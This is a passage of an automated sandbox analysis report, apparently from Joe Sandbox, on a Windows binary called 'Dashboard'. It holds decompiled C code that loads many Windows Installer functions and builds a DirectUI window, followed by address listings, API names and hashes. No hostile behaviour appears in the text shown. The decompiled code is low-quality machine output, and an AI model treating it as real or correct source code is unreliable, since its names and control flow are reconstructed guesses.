                                                                                                                    							 *((intOrPtr*)(_t187 + 0x70)) = GetProcAddress( *(_t187 + 0x10), "MsiRecordIsNull");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x74)) = GetProcAddress( *(_t187 + 0x10), "MsiRecordDataSize");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x78)) = GetProcAddress( *(_t187 + 0x10), "MsiEnumRelatedProductsW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x30)) = GetProcAddress( *(_t187 + 0x10), "MsiGetFeatureStateW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0x34)) = GetProcAddress( *(_t187 + 0x10), "MsiGetComponentPathW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xa0)) = GetProcAddress( *(_t187 + 0x10), "MsiConfigureProductExW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xa4)) = GetProcAddress( *(_t187 + 0x10), "MsiGetProductPropertyW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xa8)) = GetProcAddress( *(_t187 + 0x10), "MsiOpenProductW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xac)) = GetProcAddress( *(_t187 + 0x10), "MsiSetExternalUIRecordA");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xb0)) = GetProcAddress( *(_t187 + 0x10), "MsiApplyPatchW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xb4)) = GetProcAddress( *(_t187 + 0x10), "MsiEnumPatchesW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xb8)) = GetProcAddress( *(_t187 + 0x10), "MsiGetPatchInfoW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xbc)) = GetProcAddress( *(_t187 + 0x10), "MsiDeterminePatchSequenceW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xc0)) = GetProcAddress( *(_t187 + 0x10), "MsiApplyMultiplePatchesW");
                                                                                                                    							 *((intOrPtr*)(_t187 + 0xc4)) = GetProcAddress( *(_t187 + 0x10), "MsiGetPatchInfoExW");
                                                                                                                    							_t176 = GetProcAddress( *(_t187 + 0x10), "MsiDetermineApplicablePatchesW");
                                                                                                                    							__eflags =  *(_t187 + 0x80);
                                                                                                                    							 *(_t187 + 0xc8) = _t176;
                                                                                                                    							if( *(_t187 + 0x80) == 0) {
                                                                                                                    								L28:
                                                                                                                    								 *((intOrPtr*)(_t187 + 0xc)) = 0;
                                                                                                                    								_v8 = 0x80070641;
                                                                                                                    							} else {
                                                                                                                    								__eflags =  *(_t187 + 0x24);
                                                                                                                    								if( *(_t187 + 0x24) == 0) {
                                                                                                                    									goto L28;
                                                                                                                    								} else {
                                                                                                                    									__eflags =  *(_t187 + 0x84);
                                                                                                                    									if( *(_t187 + 0x84) == 0) {
                                                                                                                    										goto L28;
                                                                                                                    									} else {
                                                                                                                    										__eflags =  *(_t187 + 0x7c);
                                                                                                                    										if( *(_t187 + 0x7c) == 0) {
                                                                                                                    											goto L28;
                                                                                                                    										} else {
                                                                                                                    											__eflags =  *(_t187 + 0x14);
                                                                                                                    											if( *(_t187 + 0x14) == 0) {
                                                                                                                    												goto L28;
                                                                                                                    											} else {
                                                                                                                    												__eflags =  *(_t187 + 0x18);
                                                                                                                    												if( *(_t187 + 0x18) == 0) {
                                                                                                                    													goto L28;
                                                                                                                    												} else {
                                                                                                                    													__eflags =  *(_t187 + 0x1c);
                                                                                                                    													if( *(_t187 + 0x1c) == 0) {
                                                                                                                    														goto L28;
                                                                                                                    													} else {
                                                                                                                    														__eflags =  *(_t187 + 0x88);
                                                                                                                    														if( *(_t187 + 0x88) == 0) {
                                                                                                                    															goto L28;
                                                                                                                    														} else {
                                                                                                                    															__eflags =  *(_t187 + 0xcc);
                                                                                                                    															if( *(_t187 + 0xcc) == 0) {
                                                                                                                    																goto L28;
                                                                                                                    															} else {
                                                                                                                    																__eflags =  *(_t187 + 0x20);
                                                                                                                    																if( *(_t187 + 0x20) == 0) {
                                                                                                                    																	goto L28;
                                                                                                                    																} else {
                                                                                                                    																	__eflags =  *(_t187 + 0x28);
                                                                                                                    																	if( *(_t187 + 0x28) == 0) {
                                                                                                                    																		goto L28;
                                                                                                                    																	} else {
                                                                                                                    																		__eflags =  *(_t187 + 0x2c);
                                                                                                                    																		if( *(_t187 + 0x2c) == 0) {
                                                                                                                    																			goto L28;
                                                                                                                    																		} else {
                                                                                                                    																			__eflags =  *(_t187 + 0x38);
                                                                                                                    																			if( *(_t187 + 0x38) == 0) {
                                                                                                                    																				goto L28;
                                                                                                                    																			} else {
                                                                                                                    																				__eflags =  *(_t187 + 0x3c);
                                                                                                                    																				if( *(_t187 + 0x3c) == 0) {
                                                                                                                    																					goto L28;
                                                                                                                    																				} else {
                                                                                                                    																					__eflags =  *(_t187 + 0x44);
                                                                                                                    																					if( *(_t187 + 0x44) == 0) {
                                                                                                                    																						goto L28;
                                                                                                                    																					} else {
                                                                                                                    																						__eflags =  *(_t187 + 0x8c);
                                                                                                                    																						if( *(_t187 + 0x8c) == 0) {
                                                                                                                    																							goto L28;
                                                                                                                    																						} else {
                                                                                                                    																							__eflags =  *(_t187 + 0x40);
                                                                                                                    																							if( *(_t187 + 0x40) == 0) {
                                                                                                                    																								goto L28;
                                                                                                                    																							} else {
                                                                                                                    																								__eflags =  *(_t187 + 0x48);
                                                                                                                    																								if( *(_t187 + 0x48) == 0) {
                                                                                                                    																									goto L28;
                                                                                                                    																								} else {
                                                                                                                    																									__eflags =  *(_t187 + 0x4c);
                                                                                                                    																									if( *(_t187 + 0x4c) == 0) {
                                                                                                                    																										goto L28;
                                                                                                                    																									} else {
                                                                                                                    																										__eflags =  *(_t187 + 0x50);
                                                                                                                    																										if( *(_t187 + 0x50) == 0) {
                                                                                                                    																											goto L28;
                                                                                                                    																										} else {
                                                                                                                    																											__eflags =  *(_t187 + 0x90);
                                                                                                                    																											if( *(_t187 + 0x90) == 0) {
                                                                                                                    																												goto L28;
                                                                                                                    																											} else {
                                                                                                                    																												__eflags =  *(_t187 + 0x94);
                                                                                                                    																												if( *(_t187 + 0x94) == 0) {
                                                                                                                    																													goto L28;
                                                                                                                    																												} else {
                                                                                                                    																													__eflags =  *(_t187 + 0x98);
                                                                                                                    																													if( *(_t187 + 0x98) == 0) {
                                                                                                                    																														goto L28;
                                                                                                                    																													} else {
                                                                                                                    																														__eflags =  *(_t187 + 0x9c);
                                                                                                                    																														if( *(_t187 + 0x9c) == 0) {
                                                                                                                    																															goto L28;
                                                                                                                    																														}
                                                                                                                    																													}
                                                                                                                    																												}
                                                                                                                    																											}
                                                                                                                    																										}
                                                                                                                    																									}
                                                                                                                    																								}
                                                                                                                    																							}
                                                                                                                    																						}
                                                                                                                    																					}
                                                                                                                    																				}
                                                                                                                    																			}
                                                                                                                    																		}
                                                                                                                    																	}
                                                                                                                    																}
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_t128 = _v8;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t128 = 0;
                                                                                                                    				}
                                                                                                                    				return _t128;
                                                                                                                    			}










                                                                                                                    0x01014447
                                                                                                                    0x0101444c
                                                                                                                    0x01014451
                                                                                                                    0x01014454
                                                                                                                    0x01014461
                                                                                                                    0x01014464
                                                                                                                    0x01014469
                                                                                                                    0x0101446b
                                                                                                                    0x0101446e
                                                                                                                    0x010147d4
                                                                                                                    0x010147d4
                                                                                                                    0x010147d7
                                                                                                                    0x01014474
                                                                                                                    0x01014478
                                                                                                                    0x0101447d
                                                                                                                    0x0101447f
                                                                                                                    0x00000000
                                                                                                                    0x01014485
                                                                                                                    0x0101449d
                                                                                                                    0x010144ad
                                                                                                                    0x010144ba
                                                                                                                    0x010144c7
                                                                                                                    0x010144d4
                                                                                                                    0x010144e1
                                                                                                                    0x010144ee
                                                                                                                    0x010144fb
                                                                                                                    0x01014508
                                                                                                                    0x01014515
                                                                                                                    0x01014522
                                                                                                                    0x0101452f
                                                                                                                    0x0101453f
                                                                                                                    0x0101454f
                                                                                                                    0x0101455c
                                                                                                                    0x01014569
                                                                                                                    0x01014576
                                                                                                                    0x01014586
                                                                                                                    0x01014593
                                                                                                                    0x01014598
                                                                                                                    0x010145ad
                                                                                                                    0x010145bd
                                                                                                                    0x010145ca
                                                                                                                    0x010145da
                                                                                                                    0x010145ea
                                                                                                                    0x010145fa
                                                                                                                    0x0101460a
                                                                                                                    0x01014617
                                                                                                                    0x01014624
                                                                                                                    0x01014631
                                                                                                                    0x0101463e
                                                                                                                    0x0101464b
                                                                                                                    0x01014658
                                                                                                                    0x01014665
                                                                                                                    0x01014672
                                                                                                                    0x0101467f
                                                                                                                    0x0101468c
                                                                                                                    0x0101469c
                                                                                                                    0x010146ac
                                                                                                                    0x010146b4
                                                                                                                    0x010146cc
                                                                                                                    0x010146dc
                                                                                                                    0x010146ec
                                                                                                                    0x010146fc
                                                                                                                    0x0101470c
                                                                                                                    0x0101471c
                                                                                                                    0x01014722
                                                                                                                    0x01014724
                                                                                                                    0x0101472a
                                                                                                                    0x01014730
                                                                                                                    0x010147c5
                                                                                                                    0x010147c5
                                                                                                                    0x010147c8
                                                                                                                    0x01014736
                                                                                                                    0x01014736
                                                                                                                    0x01014739
                                                                                                                    0x00000000
                                                                                                                    0x0101473f
                                                                                                                    0x0101473f
                                                                                                                    0x01014745
                                                                                                                    0x00000000
                                                                                                                    0x01014747
                                                                                                                    0x01014747
                                                                                                                    0x0101474a
                                                                                                                    0x00000000
                                                                                                                    0x0101474c
                                                                                                                    0x0101474c
                                                                                                                    0x0101474f
                                                                                                                    0x00000000
                                                                                                                    0x01014751
                                                                                                                    0x01014751
                                                                                                                    0x01014754
                                                                                                                    0x00000000
                                                                                                                    0x01014756
                                                                                                                    0x01014756
                                                                                                                    0x01014759
                                                                                                                    0x00000000
                                                                                                                    0x0101475b
                                                                                                                    0x0101475b
                                                                                                                    0x01014761
                                                                                                                    0x00000000
                                                                                                                    0x01014763
                                                                                                                    0x01014763
                                                                                                                    0x01014769
                                                                                                                    0x00000000
                                                                                                                    0x0101476b
                                                                                                                    0x0101476b
                                                                                                                    0x0101476e
                                                                                                                    0x00000000
                                                                                                                    0x01014770
                                                                                                                    0x01014770
                                                                                                                    0x01014773
                                                                                                                    0x00000000
                                                                                                                    0x01014775
                                                                                                                    0x01014775
                                                                                                                    0x01014778
                                                                                                                    0x00000000
                                                                                                                    0x0101477a
                                                                                                                    0x0101477a
                                                                                                                    0x0101477d
                                                                                                                    0x00000000
                                                                                                                    0x0101477f
                                                                                                                    0x0101477f
                                                                                                                    0x01014782
                                                                                                                    0x00000000
                                                                                                                    0x01014784
                                                                                                                    0x01014784
                                                                                                                    0x01014787
                                                                                                                    0x00000000
                                                                                                                    0x01014789
                                                                                                                    0x01014789
                                                                                                                    0x0101478f
                                                                                                                    0x00000000
                                                                                                                    0x01014791
                                                                                                                    0x01014791
                                                                                                                    0x01014794
                                                                                                                    0x00000000
                                                                                                                    0x01014796
                                                                                                                    0x01014796
                                                                                                                    0x01014799
                                                                                                                    0x00000000
                                                                                                                    0x0101479b
                                                                                                                    0x0101479b
                                                                                                                    0x0101479e
                                                                                                                    0x00000000
                                                                                                                    0x010147a0
                                                                                                                    0x010147a0
                                                                                                                    0x010147a3
                                                                                                                    0x00000000
                                                                                                                    0x010147a5
                                                                                                                    0x010147a5
                                                                                                                    0x010147ab
                                                                                                                    0x00000000
                                                                                                                    0x010147ad
                                                                                                                    0x010147ad
                                                                                                                    0x010147b3
                                                                                                                    0x00000000
                                                                                                                    0x010147b5
                                                                                                                    0x010147b5
                                                                                                                    0x010147bb
                                                                                                                    0x00000000
                                                                                                                    0x010147bd
                                                                                                                    0x010147bd
                                                                                                                    0x010147c3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010147c3
                                                                                                                    0x010147bb
                                                                                                                    0x010147b3
                                                                                                                    0x010147ab
                                                                                                                    0x010147a3
                                                                                                                    0x0101479e
                                                                                                                    0x01014799
                                                                                                                    0x01014794
                                                                                                                    0x0101478f
                                                                                                                    0x01014787
                                                                                                                    0x01014782
                                                                                                                    0x0101477d
                                                                                                                    0x01014778
                                                                                                                    0x01014773
                                                                                                                    0x0101476e
                                                                                                                    0x01014769
                                                                                                                    0x01014761
                                                                                                                    0x01014759
                                                                                                                    0x01014754
                                                                                                                    0x0101474f
                                                                                                                    0x0101474a
                                                                                                                    0x01014745
                                                                                                                    0x01014739
                                                                                                                    0x010147cf
                                                                                                                    0x010147cf
                                                                                                                    0x0101447f
                                                                                                                    0x01014456
                                                                                                                    0x01014456
                                                                                                                    0x01014456
                                                                                                                    0x010147e0

                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiSetInternalUI), ref: 01014493
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiCloseHandle), ref: 010144A3
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiGetActiveDatabase), ref: 010144B0
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiViewExecute), ref: 010144BD
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiViewFetch), ref: 010144CA
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiRecordGetInteger), ref: 010144D7
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiCreateRecord), ref: 010144E4
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiEnableLogW), ref: 010144F1
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiGetProductInfoW), ref: 010144FE
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiGetPropertyW), ref: 0101450B
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiSetPropertyW), ref: 01014518
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiOpenPackageW), ref: 01014525
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiSequenceW), ref: 01014535
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiDoActionW), ref: 01014545
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiSetFeatureStateW), ref: 01014552
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiReinstallFeatureW), ref: 0101455F
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiSetExternalUIW), ref: 0101456C
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiGetTargetPathW), ref: 0101457C
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiSetTargetPathW), ref: 01014589
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiDatabaseOpenViewW), ref: 01014596
                                                                                                                    • GetProcAddress.KERNEL32(?,MsiRecordSetStringW), ref: 010145A3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID: MsiApplyMultiplePatchesW$MsiApplyPatchW$MsiCloseHandle$MsiConfigureProductExW$MsiCreateRecord$MsiDatabaseOpenViewW$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiDoActionW$MsiEnableLogW$MsiEnumPatchesW$MsiEnumRelatedProductsW$MsiGetActiveDatabase$MsiGetComponentPathW$MsiGetFeatureStateW$MsiGetMode$MsiGetPatchInfoExW$MsiGetPatchInfoW$MsiGetProductInfoW$MsiGetProductPropertyW$MsiGetPropertyW$MsiGetTargetPathW$MsiInstallProductW$MsiOpenDatabaseW$MsiOpenPackageW$MsiOpenProductW$MsiProcessMessage$MsiQueryProductStateW$MsiRecordDataSize$MsiRecordGetInteger$MsiRecordGetStringW$MsiRecordIsNull$MsiRecordSetInteger$MsiRecordSetStringW$MsiReinstallFeatureW$MsiReinstallProductW$MsiSequenceW$MsiSetExternalUIRecordA$MsiSetExternalUIW$MsiSetFeatureStateW$MsiSetInternalUI$MsiSetPropertyW$MsiSetTargetPathW$MsiSourceListAddSourceW$MsiSourceListClearAllW$MsiViewExecute$MsiViewFetch
                                                                                                                    • API String ID: 190572456-2058816641
                                                                                                                    • Opcode ID: 17b98e4289bb8679fa32b56e0c200408f15fa7c9bde7554e3916c860dd33ed6a
                                                                                                                    • Instruction ID: 0dfad8db0f510d5a1445c7f8a96d36d181f5a67ab7380ec8147bc3a8deb6e94f
                                                                                                                    • Opcode Fuzzy Hash: 17b98e4289bb8679fa32b56e0c200408f15fa7c9bde7554e3916c860dd33ed6a
                                                                                                                    • Instruction Fuzzy Hash: 8DB1BAB4940B85EFEB326F728845917BEF1FF84700B014E2EE5E69AAA0D775A054DF10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 47%
                                                                                                                    			E0101289C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr* _t88;
                                                                                                                    				struct HWND__* _t92;
                                                                                                                    				intOrPtr _t95;
                                                                                                                    				intOrPtr _t96;
                                                                                                                    				struct HWND__* _t97;
                                                                                                                    				intOrPtr _t99;
                                                                                                                    				struct HMENU__* _t100;
                                                                                                                    				struct HWND__* _t101;
                                                                                                                    				signed short _t104;
                                                                                                                    				void* _t106;
                                                                                                                    				intOrPtr _t107;
                                                                                                                    				intOrPtr _t108;
                                                                                                                    				intOrPtr _t109;
                                                                                                                    				intOrPtr _t110;
                                                                                                                    				intOrPtr _t111;
                                                                                                                    				intOrPtr _t112;
                                                                                                                    				intOrPtr _t114;
                                                                                                                    				intOrPtr _t115;
                                                                                                                    				intOrPtr _t116;
                                                                                                                    				intOrPtr _t117;
                                                                                                                    				intOrPtr _t118;
                                                                                                                    				struct HWND__* _t127;
                                                                                                                    				void* _t146;
                                                                                                                    				intOrPtr _t166;
                                                                                                                    				struct HWND__* _t168;
                                                                                                                    				void* _t171;
                                                                                                                    				intOrPtr* _t174;
                                                                                                                    				void* _t175;
                                                                                                                    
                                                                                                                    				E01008882(E010164D4, __ebx, __edi, __esi);
                                                                                                                    				_t168 =  *(_t175 + 0xc);
                                                                                                                    				_t174 = __ecx;
                                                                                                                    				 *(_t175 - 0x228) = _t168;
                                                                                                                    				 *((intOrPtr*)(_t175 - 0x220)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t175 - 0x21c)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t175 - 0x224)) = 0;
                                                                                                                    				 *(_t175 - 4) = 0;
                                                                                                                    				E0100C9C9();
                                                                                                                    				__imp__?StartDefer@Element@DirectUI@@SGXXZ(0x224);
                                                                                                                    				 *(_t175 - 4) = 1;
                                                                                                                    				if( *((intOrPtr*)(_t175 + 8)) == 0 || _t168 == 0) {
                                                                                                                    					_t169 = 0x80070057;
                                                                                                                    					goto L45;
                                                                                                                    				} else {
                                                                                                                    					_t95 =  *((intOrPtr*)( *__ecx + 0x38))();
                                                                                                                    					_t169 = _t95;
                                                                                                                    					if(_t95 < 0) {
                                                                                                                    						L46:
                                                                                                                    						_t92 =  *0x101a004; // 0x101a004
                                                                                                                    						L47:
                                                                                                                    						if(_t92 != 0x101a004 && ( *(_t92 + 0x1c) & 0x00000002) != 0) {
                                                                                                                    							_t74 = _t92 + 0x14; // 0x65637845
                                                                                                                    							_t75 = _t92 + 0x10; // 0x6c744143
                                                                                                                    							_t92 = E010090EF( *_t75,  *_t74, 0x10, 0x1003450, _t169);
                                                                                                                    						}
                                                                                                                    						_t174 = _t174 + 4;
                                                                                                                    						__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    						if(_t92 != 0) {
                                                                                                                    							__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    							PostMessageW(_t92, 0x10, 0, 0);
                                                                                                                    						}
                                                                                                                    						L52:
                                                                                                                    						E010125F2(_t175 - 0x220, _t175 - 0x220);
                                                                                                                    						 *(_t175 - 4) = 0;
                                                                                                                    						__imp__?EndDefer@Element@DirectUI@@SGXXZ();
                                                                                                                    						E0100C9AF();
                                                                                                                    						_t88 =  *((intOrPtr*)(_t175 - 0x224));
                                                                                                                    						 *(_t175 - 4) =  *(_t175 - 4) | 0xffffffff;
                                                                                                                    						if(_t88 != 0) {
                                                                                                                    							 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                                    						}
                                                                                                                    						return E01008914(0, _t169, _t174);
                                                                                                                    					}
                                                                                                                    					if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
                                                                                                                    						L9:
                                                                                                                    						_t96 = _t175 - 0x220;
                                                                                                                    						__imp__?LoadAndCreateElement@CRMDUIParser@@QAEJIPB_WPAPAVElement@DirectUI@@PAV23@K0@Z( *((intOrPtr*)(_t175 + 8)),  *(_t175 - 0x228), _t96, 0, 0xf, 0);
                                                                                                                    						_t169 = _t96;
                                                                                                                    						_t92 =  *0x101a004; // 0x101a004
                                                                                                                    						if(_t92 != 0x101a004 && ( *(_t92 + 0x1c) & 0x00000010) != 0) {
                                                                                                                    							_t22 = _t92 + 0x14; // 0x65637845
                                                                                                                    							_t23 = _t92 + 0x10; // 0x6c744143
                                                                                                                    							E010090EF( *_t23,  *_t22, 0xd, 0x1003450, _t169);
                                                                                                                    							_t92 =  *0x101a004; // 0x101a004
                                                                                                                    						}
                                                                                                                    						if(_t169 < 0) {
                                                                                                                    							goto L47;
                                                                                                                    						} else {
                                                                                                                    							_t97 = GetForegroundWindow();
                                                                                                                    							 *(_t175 - 0x228) = _t97;
                                                                                                                    							_t99 =  *((intOrPtr*)( *_t174 + 0x24))(0,  *0x101a574, 3);
                                                                                                                    							__imp__?Initialize@NativeHWNDHost@DirectUI@@QAEJPB_W0PAUHWND__@@PAUHICON__@@HHHHHHHPAUHINSTANCE__@@I@Z( *0x101a4f0, 0, 0, 0,  *((intOrPtr*)(_t175 + 0x10)),  *((intOrPtr*)(_t175 + 0x14)),  *((intOrPtr*)(_t175 + 0x18)),  *((intOrPtr*)(_t175 + 0x1c)), 0, _t99);
                                                                                                                    							_t169 = _t99;
                                                                                                                    							_t92 =  *0x101a004; // 0x101a004
                                                                                                                    							if(_t92 != 0x101a004 && ( *(_t92 + 0x1c) & 0x00000010) != 0) {
                                                                                                                    								_t34 = _t92 + 0x14; // 0x65637845
                                                                                                                    								_t35 = _t92 + 0x10; // 0x6c744143
                                                                                                                    								E010090EF( *_t35,  *_t34, 0xe, 0x1003450, _t169);
                                                                                                                    								_t92 =  *0x101a004; // 0x101a004
                                                                                                                    							}
                                                                                                                    							if(_t169 < 0) {
                                                                                                                    								goto L47;
                                                                                                                    							} else {
                                                                                                                    								_t171 = _t174 + 4;
                                                                                                                    								__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    								if(_t92 != 0) {
                                                                                                                    									__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    									_t100 = GetSystemMenu(_t92, 0);
                                                                                                                    									if(_t100 == 0) {
                                                                                                                    										goto L18;
                                                                                                                    									}
                                                                                                                    									_t101 = RemoveMenu(_t100, 0xf000, 0);
                                                                                                                    									if(_t101 == 0) {
                                                                                                                    										goto L18;
                                                                                                                    									}
                                                                                                                    									__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    									SetWindowPos(_t101,  *(_t175 - 0x228), 0, 0, 0, 0, 0x13);
                                                                                                                    									_t104 =  *((intOrPtr*)( *_t174 + 0x30))();
                                                                                                                    									if(_t104 > 0) {
                                                                                                                    										_t127 = _t104 & 0x0000ffff;
                                                                                                                    										__imp__?RMLoadIcon@@YGPAUHICON__@@PB_WK0@Z(_t127, 0xf, 0);
                                                                                                                    										__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    										SendMessageW(_t127, 0x80, 1, _t127);
                                                                                                                    									}
                                                                                                                    									_t106 =  *((intOrPtr*)( *_t174 + 0x2c))();
                                                                                                                    									if(_t106 > 0) {
                                                                                                                    										__imp__?RMLoadString@@YGIIPA_WIKPB_W@Z(_t106, _t175 - 0x218, 0x104, 0xf, 0);
                                                                                                                    										__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    										SetWindowTextW(_t175 - 0x218, _t175 - 0x218);
                                                                                                                    									}
                                                                                                                    									_t107 = _t175 - 0x21c;
                                                                                                                    									_t146 = _t171;
                                                                                                                    									__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ(1, 0, 0, _t107);
                                                                                                                    									__imp__?Create@HWNDElement@DirectUI@@SGJPAUHWND__@@_NI1PAPAVElement@2@@Z(_t107);
                                                                                                                    									_t169 = _t107;
                                                                                                                    									_t92 =  *0x101a004; // 0x101a004
                                                                                                                    									if(_t92 != 0x101a004 && ( *(_t92 + 0x1c) & 0x00000010) != 0) {
                                                                                                                    										_t46 = _t92 + 0x14; // 0x65637845
                                                                                                                    										_t47 = _t92 + 0x10; // 0x6c744143
                                                                                                                    										E010090EF( *_t47,  *_t46, 0xf, 0x1003450, _t169);
                                                                                                                    										_t92 =  *0x101a004; // 0x101a004
                                                                                                                    									}
                                                                                                                    									if(_t169 < 0) {
                                                                                                                    										goto L47;
                                                                                                                    									} else {
                                                                                                                    										_t108 = E01012834(_t146,  *((intOrPtr*)(_t175 - 0x21c)));
                                                                                                                    										_t169 = _t108;
                                                                                                                    										if(_t108 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t109 = E0101267D(_t108,  *((intOrPtr*)(_t175 - 0x21c)), 1);
                                                                                                                    										_t169 = _t109;
                                                                                                                    										if(_t109 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t110 = E0101270B(_t109,  *((intOrPtr*)(_t175 - 0x21c)), L"DUI Window Frame");
                                                                                                                    										_t169 = _t110;
                                                                                                                    										if(_t110 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t111 = E0100C964(_t110,  *((intOrPtr*)(_t175 - 0x21c)), L"Direct UI window");
                                                                                                                    										_t169 = _t111;
                                                                                                                    										if(_t111 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t112 = E010126C4(_t111,  *((intOrPtr*)(_t175 - 0x21c)), 9);
                                                                                                                    										_t169 = _t112;
                                                                                                                    										if(_t112 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t114 =  *((intOrPtr*)( *_t174))(_t174, 0x1004488, _t175 - 0x224);
                                                                                                                    										_t169 = _t114;
                                                                                                                    										if(_t114 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t115 = E01012756(_t114,  *((intOrPtr*)(_t175 - 0x21c)),  *((intOrPtr*)(_t175 - 0x224)));
                                                                                                                    										_t169 = _t115;
                                                                                                                    										if(_t115 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t116 = E0100C840(_t115,  *((intOrPtr*)(_t175 - 0x21c)), 1);
                                                                                                                    										_t169 = _t116;
                                                                                                                    										if(_t116 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										__imp__?Host@NativeHWNDHost@DirectUI@@QAEXPAVElement@2@@Z( *((intOrPtr*)(_t175 - 0x21c)));
                                                                                                                    										_t117 = _t174 + 0x28;
                                                                                                                    										__imp__?AddListener@Element@DirectUI@@QAEJPAUIElementListener@2@@Z(_t117);
                                                                                                                    										_t169 = _t117;
                                                                                                                    										if(_t117 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										__imp__?Add@Element@DirectUI@@QAEJPAV12@@Z( *((intOrPtr*)(_t175 - 0x220)));
                                                                                                                    										_t169 = _t117;
                                                                                                                    										if(_t117 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										 *((intOrPtr*)(_t175 - 0x220)) = 0;
                                                                                                                    										__imp__?Attach@CRMDUIParser@@QAEJPAVElement@DirectUI@@@Z( *((intOrPtr*)(_t175 - 0x21c)));
                                                                                                                    										_t169 = _t117;
                                                                                                                    										if(_t117 < 0) {
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t118 =  *((intOrPtr*)(_t175 - 0x21c));
                                                                                                                    										__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    										__imp__BuildDropTarget( *((intOrPtr*)(_t118 + 4)), _t118);
                                                                                                                    										if(_t118 != 0) {
                                                                                                                    											_t169 =  *((intOrPtr*)( *_t174 + 0x3c))();
                                                                                                                    											if(_t169 < 0) {
                                                                                                                    												goto L46;
                                                                                                                    											}
                                                                                                                    											E010127FC( *((intOrPtr*)( *_t174 + 0x28))(), _t174, _t122);
                                                                                                                    											L45:
                                                                                                                    											if(_t169 >= 0) {
                                                                                                                    												goto L52;
                                                                                                                    											}
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										_t169 = 0x80004005;
                                                                                                                    										goto L46;
